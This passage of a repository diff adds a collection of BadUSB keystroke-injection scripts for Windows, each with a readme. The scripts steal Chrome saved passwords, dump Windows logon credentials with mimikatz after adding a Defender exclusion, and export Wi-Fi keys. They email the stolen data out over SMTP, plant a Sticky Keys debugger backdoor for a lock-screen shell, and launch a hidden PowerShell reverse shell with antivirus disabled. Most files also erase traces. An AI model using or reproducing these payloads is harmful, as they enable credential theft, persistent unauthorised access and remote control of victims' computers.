     32 +STRING Add-Type "using System.Runtime.InteropServices;using p=System.IntPtr;$p class W{$($i)open$g p O($($m)Str)]string f,out p d);$($i)prepare16_v2$g p P(p d,$($m)WStr)]string l,int n,out p s,p t);$($i)step$g p S(p s);$($i)column_text16$g p C$f;$($i)column_bytes$g int Y$f;$($i)column_blob$g p L$f;$p string T$f{return Marshal.PtrToStringUni(C$q);}$p byte[] B$f{var r=new byte[Y$q];Marshal.Copy(L$q,r,0,Y$q);return r;}}"
     33 +ENTER
     34 +STRING $s=[W]::O("$z\\Default\\Login Data",[ref]$d)
     35 +ENTER
     36 +STRING $l=@()
     37 +ENTER
     38 +STRING if($host.Version-like"7*"){$b=(gc "$z\\Local State"|ConvertFrom-Json).os_crypt.encrypted_key
     39 +ENTER
     40 +STRING $x=[Security.Cryptography.AesGcm]::New($u::Unprotect([Convert]::FromBase64String($b)[5..($b.length-1)],$n,0))}$_=[W]::P($d,"SELECT*FROM logins WHERE blacklisted_by_user=0",-1,[ref]$s,0)
     41 +ENTER
     42 +STRING for(;!([W]::S($s)%100)){$l+=[W]::T($s,0),[W]::T($s,3)
     43 +ENTER
     44 +STRING $c=[W]::B($s,5)
     45 +ENTER
     46 +STRING try{$e=$u::Unprotect($c,$n,0)}catch{if($x){$k=$c.length
     47 +ENTER
     48 +STRING $e=[byte[]]::new($k-31)
     49 +ENTER
     50 +STRING $x.Decrypt($c[3..14],$c[15..($k-17)],$c[($k-16)..($k-1)],$e)}}$l+=($e|%{[char]$_})-join''}
     51 +ENTER
     52 +STRING $r=[Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes(($l)-join','))
     53 +ENTER
     54 +STRING start-process "chrome" "--headless http://localhost:8000/?$r"
     55 +ENTER
     56 +DELAY 1000
     57 +STRING exit
     58 +ENTER
     59 +DELAY 250
     60 +STRING exit
     61 +ENTER
     62 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/PasswordStuff/ChromePasswords/readme.md
     1 +
     2 +# ChromePasswords
     3 +Grabs saved Passwords from Chrome.
     4 +
     5 +## How to use?
     6 +
     7 +This script is plug and play.
     8 +
     9 +
     10 +## Features
     11 +
     12 +- open powershell
     13 +- save chrome profile
     14 +- paste profile to a file
     15 +
     16 +## Feedback
     17 +
     18 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     19 +
     20 +
     21 +
     22 +
     23 +
     24 +
     25 +## Support
     26 +
     27 +For support, contact me via Discord "UNC0V3R3D#8662".
     28 +
     29 +
     30 +## Meta
     31 +
     32 +
     33 +- If you want to sponsor me on Patreon, the link is on my profile.
     34 +
     35 +
     36 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/PasswordStuff/Show_Saved_Password/Show_Saved_Passwords.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Shows all saved passwords.
     3 +REM Version: 1.0
     4 +REM Category: Passwords
     5 +DELAY 900
     6 +GUI r
     7 +DELAY 1000
     8 +STRING powershell
     9 +ENTER
     10 +DELAY 1000
     11 +STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Headers @{'Referer' = 'http://www.nirsoft.net/utils/web_browser_password.html'} -Uri http://www.nirsoft.net/toolsdownload/webbrowserpassview.zip -OutFile wbpv.zip ; Invoke-WebRequest -Uri https://www.7-zip.org/a/7za920.zip -OutFile 7z.zip ; Expand-Archive 7z.zip ; .\7z\7za.exe e wbpv.zip
     12 +ENTER
     13 +DELAY 5000
     14 +STRING wbpv28821@
     15 +ENTER
     16 +STRING .\WebBrowserPassView.exe
     17 +ENTER
     18 +DELAY 3000
     19 +CTRL A
     20 +CTRL S
     21 +DELAY 1000
     22 +STRING export.html
     23 +TAB
     24 +STRING h
     25 +ENTER
     26 +DELAY 1000
     27 +ALT F4
     28 +DELAY 1000
     29 +STRING Start-Process msedge.exe 'file:///C:/temp/export.html --inprivate'
     30 +ENTER
     31 +DELAY 2000
     32 +ALT TAB
     33 +DELAY 1000
     34 +STRING cd \
     35 +ENTER
     36 +STRING rmdir -R \temp
     37 +ENTER
     38 +STRING EXIT
     39 +ENTER
     40 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/PasswordStuff/Show_Saved_Password/readme.md
     1 +
     2 +# Show_Saved_Passwords
     3 +Shows all saved passwords.
     4 +
     5 +## How to use?
     6 +
     7 +This script is plug and play.
     8 +
     9 +
     10 +## Features
     11 +
     12 +- open powershell
     13 +- download webbrowserview.exe
     14 +- save passwords from webbrowsers
     15 +
     16 +## Feedback
     17 +
     18 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     19 +
     20 +
     21 +
     22 +
     23 +
     24 +
     25 +## Support
     26 +
     27 +For support, contact me via Discord "UNC0V3R3D#8662".
     28 +
     29 +
     30 +## Meta
     31 +
     32 +
     33 +- If you want to sponsor me on Patreon, the link is on my profile.
     34 +
     35 +
     36 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/PasswordStuff/Simple_User_Password_Grabber/Simple_User_Password_Grabber.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Grabs the current Windows User password.
     3 +REM Version: 1.0
     4 +REM Category: Passwords
     5 +DEFAULT_DELAY 450
     6 +DELAY 1500
     7 +GUI r
     8 +STRING powershell
     9 +CTRL-SHIFT ENTER
     10 +DELAY 600
     11 +ALT y
     12 +STRING Set-MpPreference -ExclusionPath C:\Users
     13 +ENTER
     14 +STRING exit
     15 +ENTER
     16 +GUI r
     17 +STRING cmd
     18 +CTRL-SHIFT ENTER
     19 +DELAY 600
     20 +ALT y
     21 +STRING powershell (new-object System.Net.WebClient).DownloadFile('LINK TO MIMIKATZ.EXE DOWNLOAD HERE','%temp%\pw.exe')
     22 +ENTER
     23 +DELAY 4000
     24 +STRING %TEMP%\pw.exe > c:\pwlog.txt & type pwlog.txt;
     25 +ENTER
     26 +STRING privilege::debug
     27 +ENTER
     28 +STRING sekurlsa::logonPasswords full
     29 +ENTER
     30 +STRING exit
     31 +ENTER
     32 +STRING del %TEMP%\pw.exe
     33 +ENTER
     34 +STRING exit
     35 +ENTER
     36 +GUI r
     37 +STRING powershell
     38 +CTRL-SHIFT ENTER
     39 +DELAY 600
     40 +ALT y
     41 +STRING Remove-MpPreference -ExclusionPath C:\Users
     42 +ENTER
     43 +STRING $SMTPServer = 'smtp.gmail.com'
     44 +ENTER
     45 +STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
     46 +ENTER
     47 +STRING $SMTPInfo.EnableSsl = $true
     48 +ENTER
     49 +STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@
     50 +SHIFT 2
     51 +STRING gmail.com', 'PASSWORDHERE');
     52 +ENTER
     53 +STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
     54 +ENTER
     55 +STRING $ReportEmail.From = 'THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@
     56 +SHIFT 2
     57 +STRING gmail.com'
     58 +ENTER
     59 +STRING $ReportEmail.To.Add('THE-PART-OF-RECEIVERS-EMAIL-BEFORE-THE-@
     60 +SHIFT 2
     61 +STRING gmail.com')
     62 +ENTER
     63 +STRING $ReportEmail.Subject = 'Hello from the ducky'
     64 +ENTER
     65 +STRING $ReportEmail.Body = 'Attached is your duck report.'
     66 +ENTER
     67 +STRING $ReportEmail.Attachments.Add('c:\pwlog.txt')
     68 +ENTER
     69 +STRING $SMTPInfo.Send($ReportEmail)
     70 +ENTER
     71 +DELAY 4000
     72 +STRING exit
     73 +ENTER
     74 +GUI r
     75 +STRING powershell
     76 +CTRL-SHIFT ENTER
     77 +DELAY 600
     78 +ALT y
     79 +STRING del c:\pwlog.txt
     80 +ENTER
     81 +STRING Remove-Item (Get-PSreadlineOption).HistorySavePath
     82 +ENTER
     83 +STRING exit
     84 +ENTER
     85 +GUI l
     86 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/PasswordStuff/Simple_User_Password_Grabber/readme.md
     1 +
     2 +# Simple_user_Password_Grabber
     3 +Grabs the current Windows User password.
     4 +
     5 +## How to use?
     6 +
     7 +This script is not plug and play and only for experienced users. You will need to do the following changes:
     8 +
     9 +- change link to mimikatz.exe "('LINK TO MIMIKATZ.EXE DOWNLOAD HERE','%temp%\pw.exe')"
     10 +- change email credential 1 "('THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@"
     11 +- change email credential 2 "gmail.com', 'PASSWORDHERE');"
     12 +- change email credential 3 "$ReportEmail.From = 'THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@"
     13 +- change email credential 4 "$ReportEmail.To.Add('THE-PART-OF-RECEIVERS-EMAIL-BEFORE-THE-@"
     14 +
     15 +
     16 +## Features
     17 +
     18 +- open powershell
     19 +- download mimikatz
     20 +- get user password
     21 +- send password to email
     22 +
     23 +## Feedback
     24 +
     25 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     26 +
     27 +
     28 +
     29 +
     30 +
     31 +
     32 +## Support
     33 +
     34 +For support, contact me via Discord "UNC0V3R3D#8662".
     35 +
     36 +
     37 +## Meta
     38 +
     39 +
     40 +- If you want to sponsor me on Patreon, the link is on my profile.
     41 +
     42 +
     43 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys/StealWifiKeys.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Steals all of the saved Wifi Passwords and stores them into a file.
     3 +REM Version: 1.0
     4 +REM Category: Passwords
     5 +DELAY 500
     6 +WINDOWS d
     7 +DELAY 500
     8 +WINDOWS r
     9 +DELAY 500
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 800
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 800
     16 +ALT y
     17 +DELAY 500
     18 +GUI UP
     19 +DELAY 600
     20 +STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;netsh wlan export profile key=clear folder=$fileSaveDir;Compress-Archive -Path $fileSaveDir -DestinationPath C:PUT PATH HERE\ResultsPassword.zip ; exit
     21 +ENTER
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys/readme.md
     1 +
     2 +# StealWifiKeys
     3 +Steals all of the saved Wifi Passwords and stores them into a file.
     4 +
     5 +## How to use?
     6 +
     7 +This script is not plug and play. You will need to do the following changes:
     8 +
     9 +- change destination path "-DestinationPath C:PUT PATH HERE\ResultsPassword.zip"
     10 +
     11 +
     12 +## Features
     13 +
     14 +- open powershell
     15 +- grab wifi keys
     16 +- store keys to a file
     17 +
     18 +## Feedback
     19 +
     20 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     21 +
     22 +
     23 +
     24 +
     25 +
     26 +
     27 +## Support
     28 +
     29 +For support, contact me via Discord "UNC0V3R3D#8662".
     30 +
     31 +
     32 +## Meta
     33 +
     34 +
     35 +- If you want to sponsor me on Patreon, the link is on my profile.
     36 +
     37 +
     38 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_Email/StealWifiKeys_Email.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Steals all of the saved Wifi Passwords and sends them via an outlook email.
     3 +REM Version: 1.0
     4 +REM Category: Passwords
     5 +DEFAULT_DELAY 600
     6 +DELAY 500
     7 +WINDOWS r
     8 +DELAY 500
     9 +STRING cmd
     10 +ENTER
     11 +DELAY 200
     12 +STRING cd %USERPROFILE% & netsh wlan show profiles | findstr "All" > a.txt
     13 +ENTER
     14 +STRING echo SETLOCAL EnableDelayedExpansion^
     15 +ENTER
     16 +ENTER
     17 +STRING for /f "tokens=5*" %%i in (a.txt) do (^
     18 +ENTER
     19 +ENTER
     20 +STRING set val=%%i %%j^
     21 +ENTER
     22 +ENTER
     23 +STRING if "!val:~-1!" == " " set val=!val:~0,-1!^
     24 +ENTER
     25 +ENTER
     26 +STRING echo !val!^>^>b.txt) > filter.bat
     27 +ENTER
     28 +STRING filter.bat
     29 +DELAY 300
     30 +ENTER
     31 +STRING (for /f "tokens=*" %i in (b.txt) do @echo SSID: %i & netsh wlan show profiles name="%i" key=clear | findstr /c:"Key Content" & echo.) > Log.txt
     32 +ENTER
     33 +DELAY 1000
     34 +STRING exit
     35 +DELAY 500
     36 +ENTER
     37 +DELAY 1000
     38 +WINDOWS r
     39 +DELAY 500
     40 +STRING powershell
     41 +ENTER
     42 +DELAY 1000
     43 +STRING del .\a.txt
     44 +ENTER
     45 +STRING del .\b.txt
     46 +ENTER
     47 +STRING del .\filter.bat
     48 +ENTER
     49 +STRING $SMTPServer = 'smtp-mail.outlook.com'
     50 +ENTER
     51 +STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
     52 +ENTER
     53 +STRING $SMTPInfo.EnableSSL = $true
     54 +ENTER
     55 +STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('EMAIL HERE', 'EMAIL PASSWORD HERE')
     56 +ENTER
     57 +STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
     58 +ENTER
     59 +STRING $ReportEmail.From = 'YOUR EMAIL'
     60 +ENTER
     61 +STRING $ReportEmail.To.Add('email to send to')
     62 +ENTER
     63 +STRING $ReportEmail.Subject = 'WiFi key grabber'
     64 +ENTER
     65 +STRING $ReportEmail.Body = (Get-Content Log.txt | out-string)
     66 +ENTER
     67 +STRING $SMTPInfo.Send($ReportEmail)
     68 +ENTER
     69 +DELAY 3000
     70 +STRING del Log.txt
     71 +DELAY 500
     72 +STRING exit
     73 +ENTER
     74 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_Email/readme.md
     1 +
     2 +# StealWifiKeys_Email
     3 +Steals all of the saved Wifi Passwords and stores them into a file, then sends the file via email.
     4 +
     5 +## How to use?
     6 +
     7 +This script is not plug and play and only for experienced users. You will need to do the following changes:
     8 +
     9 +- change credentials "System.Net.NetworkCredential('EMAIL HERE', 'EMAIL PASSWORD HERE')"
     10 +- change credentails "$ReportEmail.From = 'YOUR EMAIL'"
     11 +- change credentials "$ReportEmail.To.Add('email to send to')"
     12 +
     13 +
     14 +## Features
     15 +
     16 +- open powershell
     17 +- grab wifi keys
     18 +- store keys to a file
     19 +- send file via email
     20 +
     21 +## Feedback
     22 +
     23 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     24 +
     25 +
     26 +
     27 +
     28 +
     29 +
     30 +## Support
     31 +
     32 +For support, contact me via Discord "UNC0V3R3D#8662".
     33 +
     34 +
     35 +## Meta
     36 +
     37 +
     38 +- If you want to sponsor me on Patreon, the link is on my profile.
     39 +
     40 +
     41 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_onUSB/StealWifiKeys_onUSB.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Steals all of the saved Wifi Passwords and stores them into a USB device of your choice.
     3 +REM Version: 1.0
     4 +REM Category: Passwords
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 1000
     8 +WINDOWS r
     9 +DELAY 900
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 750
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 900
     16 +ALT y
     17 +DELAY 900
     18 +GUI UP
     19 +DELAY 900
     20 +STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;netsh wlan export profile key=clear folder=$fileSaveDir;Compress-Archive -Path $fileSaveDir -DestinationPath File path on USB device here
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_onUSB/readme.md
     1 +
     2 +# StealWifiKeys_onUSB
     3 +Steals all of the saved Wifi Passwords and stores them into a file, then puts the file on a usb device connected to the target pc.
     4 +
     5 +## How to use?
     6 +
     7 +This script is not plug and play and only for experienced users. You will need to do the following changes:
     8 +
     9 +- change path to the usb device "-DestinationPath File path on USB device here"
     10 +
     11 +
     12 +## Features
     13 +
     14 +- open powershell
     15 +- grab wifi keys
     16 +- store keys to a file on a usb device
     17 +
     18 +## Feedback
     19 +
     20 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     21 +
     22 +
     23 +
     24 +
     25 +
     26 +
     27 +## Support
     28 +
     29 +For support, contact me via Discord "UNC0V3R3D#8662".
     30 +
     31 +
     32 +## Meta
     33 +
     34 +
     35 +- If you want to sponsor me on Patreon, the link is on my profile.
     36 +
     37 +
     38 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Remote-Access/CommandLineBackdoor/CommandLineBackdoor.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Creates a command prompt "backdoor" that can be launched in almost any "secure" Windows environment,
     3 +REM (Lock Screen for example) via Sticky Keys shortcuts (Pressing shift five times) or the keyboard combination Alt+Shift+PrtScr.
     4 +REM This then results in launching the command prompt in the same account as the current environment, i.e. SYSTEM or your user account.
     5 +REM Version: 1.0
     6 +REM Category: Remote_Access
     7 +REM plug in second USB in before the Flipper
     8 +DELAY 3000
     9 +CONTROL ESCAPE
     10 +DELAY 500
     11 +STRING notepad
     12 +DELAY 250
     13 +ENTER
     14 +DELAY 750
     15 +STRING @echo off
     16 +ENTER
     17 +STRING :init
     18 +ENTER
     19 +STRING setlocal DisableDelayedExpansion
     20 +ENTER
     21 +STRING set cmdInvoke=1
     22 +ENTER
     23 +STRING set winSysFolder=System32
     24 +ENTER
     25 +STRING set "batchPath=%~0"
     26 +ENTER
     27 +STRING for %%k in (%0) do set batchName=%%~nk
     28 +ENTER
     29 +STRING set "TEMPVBS=%temp%\OEgetPriv_run.vbs"
     30 +ENTER
     31 +STRING setlocal EnableDelayedExpansion
     32 +ENTER
     33 +STRING :checkPrivileges
     34 +ENTER
     35 +STRING NET FILE 1>NUL 2>NUL
     36 +ENTER
     37 +STRING if '%errorlevel%' == '0' (goto gotPrivileges) else (goto getPrivileges)
     38 +ENTER
     39 +STRING :getPrivileges
     40 +ENTER
     41 +STRING if '%1'=='ELEV' (echo ELEV & shift /1 & goto gotPrivileges)
     42 +ENTER
     43 +STRING echo Set UAC = CreateObject^("Shell.Application"^) > "%TEMPVBS%"
     44 +ENTER
     45 +STRING echo args = "ELEV " >> "%TEMPVBS%"
     46 +ENTER
     47 +STRING echo For Each strArg in WScript.Arguments >> "%TEMPVBS%"
     48 +ENTER
     49 +STRING echo args = args ^& strArg ^& " " >> "%TEMPVBS%"
     50 +ENTER
     51 +STRING echo Next>> "%TEMPVBS%"
     52 +ENTER
     53 +STRING if '%cmdInvoke%'=='1' goto InvokeCmd
     54 +ENTER
     55 +STRING echo UAC.ShellExecute "!batchPath!", args, "", "runas", 1 >> "%TEMPVBS%"
     56 +ENTER
     57 +STRING goto ExecElevation
     58 +ENTER
     59 +STRING :InvokeCmd
     60 +ENTER
     61 +STRING echo args = "/c """ + "!batchPath!" + """ " + args >> "%TEMPVBS%"
     62 +ENTER
     63 +STRING echo UAC.ShellExecute "%SystemRoot%\%winSysFolder%\cmd.exe", args, "", "runas", 1 >> "%TEMPVBS%"
     64 +ENTER
     65 +STRING :ExecElevation
     66 +ENTER
     67 +STRING "%SystemRoot%\%winSysFolder%\WScript.exe" "%TEMPVBS%" %*
     68 +ENTER
     69 +STRING exit /B
     70 +ENTER
     71 +STRING :gotPrivileges
     72 +ENTER
     73 +STRING setlocal & cd /d "%~dp0."
     74 +ENTER
     75 +STRING if '%1'=='ELEV' (del "%TEMPVBS%" 1>nul 2>nul & shift /1)
     76 +ENTER
     77 +STRING reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /ve /f && reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f && cls && echo Payload Installed Successfully && pause && goto end
     78 +ENTER
     79 +STRING cls
     80 +ENTER
     81 +STRING echo Payload Install Failed
     82 +ENTER
     83 +STRING pause
     84 +ENTER
     85 +STRING :end
     86 +ENTER
     87 +STRING del /F /Q "%~0" && exit
     88 +CONTROL s
     89 +DELAY 500
     90 +STRING %temp%\run.bat
     91 +TAB
     92 +STRING a
     93 +ENTER
     94 +DELAY 250
     95 +ALT F4
     96 +DELAY 250
     97 +CONTROL ESCAPE
     98 +DELAY 500
     99 +STRING %temp%\run.bat
     100 +ENTER
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Remote-Access/CommandLineBackdoor/readme.md
     1 +
     2 +# CommandLineBackdoor
     3 +This script is for learning purposes only. I am not responsible for your actions and not going to help you with anything.
     4 +
     5 +## How to use?
     6 +
     7 +This script is not plug and play and only for experienced users. You will need to do everything on your own as I am not responsible.
     8 +
     9 +
     10 +## Features
     11 +
     12 +- x
     13 +
     14 +## Feedback
     15 +
     16 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     17 +
     18 +
     19 +
     20 +
     21 +
     22 +
     23 +## Support
     24 +
     25 +For support, contact me via Discord "UNC0V3R3D#8662".
     26 +
     27 +
     28 +## Meta
     29 +
     30 +
     31 +- If you want to sponsor me on Patreon, the link is on my profile.
     32 +
     33 +
     34 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Remote-Access/ReversePowershell/ReversePowershell.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Reverse-PowerShell Windows. I am not responsible for your actions.
     3 +REM Version: 1.0
     4 +REM Category: Remote_Access
     5 +DELAY 750
     6 +GUI r
     7 +DELAY 1000
     8 +STRING powershell Start-Process notepad -Verb runAs
     9 +ENTER
     10 +DELAY 750
     11 +ALT y
     12 +DELAY 750
     13 +ENTER
     14 +ALT SPACE
     15 +DELAY 1000
     16 +STRING m
     17 +DELAY 1000
     18 +DOWNARROW
     19 +REPEAT 100
     20 +ENTER
     21 +STRING Add-Content “$env:TEMP\34593.ps1” ‘$c = New-Object System.Net.Sockets.TCPClient(“”,);$s = $c.GetStream();[byte[]]$b = 0..255|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $d 2>&1 | Out-String );$sb2 = $sb + “PS ” + (pwd).Path + “> “;$sby = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sby,0,$sby.Length);$s.Flush()};$c.Close()’
     22 +ENTER
     23 +DELAY 750
     24 +STRING Set-MpPreference -DisableRealtimeMonitoring $true
     25 +DELAY 500
     26 +ENTER
     27 +DELAY 750
     28 +STRING start-Process powershell.exe -windowstyle hidden “$env:TEMP\34593.ps1”
     29 +ENTER
     30 +STRING Remove-Item $MyINvocation.InvocationName
     31 +ENTER
     32 +CTRL s
     33 +DELAY 1000
     34 +STRING C:\Windows\config-34593.ps1
     35 +ENTER
     36 +DELAY 1000
     37 +ALT F4
     38 +DELAY 750
     39 +GUI r
     40 +DELAY 750
     41 +STRING powershell Start-Process cmd -Verb runAs
     42 +ENTER
     43 +DELAY 750
     44 +ALT y
     45 +DELAY 1000
     46 +STRING mode con:cols=14 lines=1
     47 +ENTER
     48 +ALT SPACE
     49 +DELAY 750
     50 +STRING m
     51 +DELAY 750
     52 +DOWNARROW
     53 +REPEAT 100
     54 +ENTER
     55 +STRING powershell Set-ExecutionPolicy ‘Unrestricted’ -Scope CurrentUser -Confirm:$false
     56 +ENTER
     57 +DELAY 750
     58 +STRING powershell.exe -windowstyle hidden -File C:\Windows\config-34593.ps1
     59 +ENTER
     60 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Remote-Access/ReversePowershell/readme.md
     1 +
     2 +# ReversePowershell
     3 +This script is for learning purposes only. I am not responsible for your actions and not going to help you with anything.
     4 +
     5 +## How to use?
     6 +
     7 +This script is not plug and play and only for experienced users. You will need to do everything on your own as I am not responsible.
     8 +
     9 +
     10 +## Features
     11 +
     12 +- x
     13 +
     14 +## Feedback
     15 +
     16 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     17 +
     18 +
     19 +
     20 +
     21 +
     22 +
     23 +## Support
     24 +
     25 +For support, contact me via Discord "UNC0V3R3D#8662".
     26 +
     27 +
     28 +## Meta
     29 +
     30 +
     31 +- If you want to sponsor me on Patreon, the link is on my profile.
     32 +
     33 +
     34 + 
Please wait...
Page is in error, reload to recover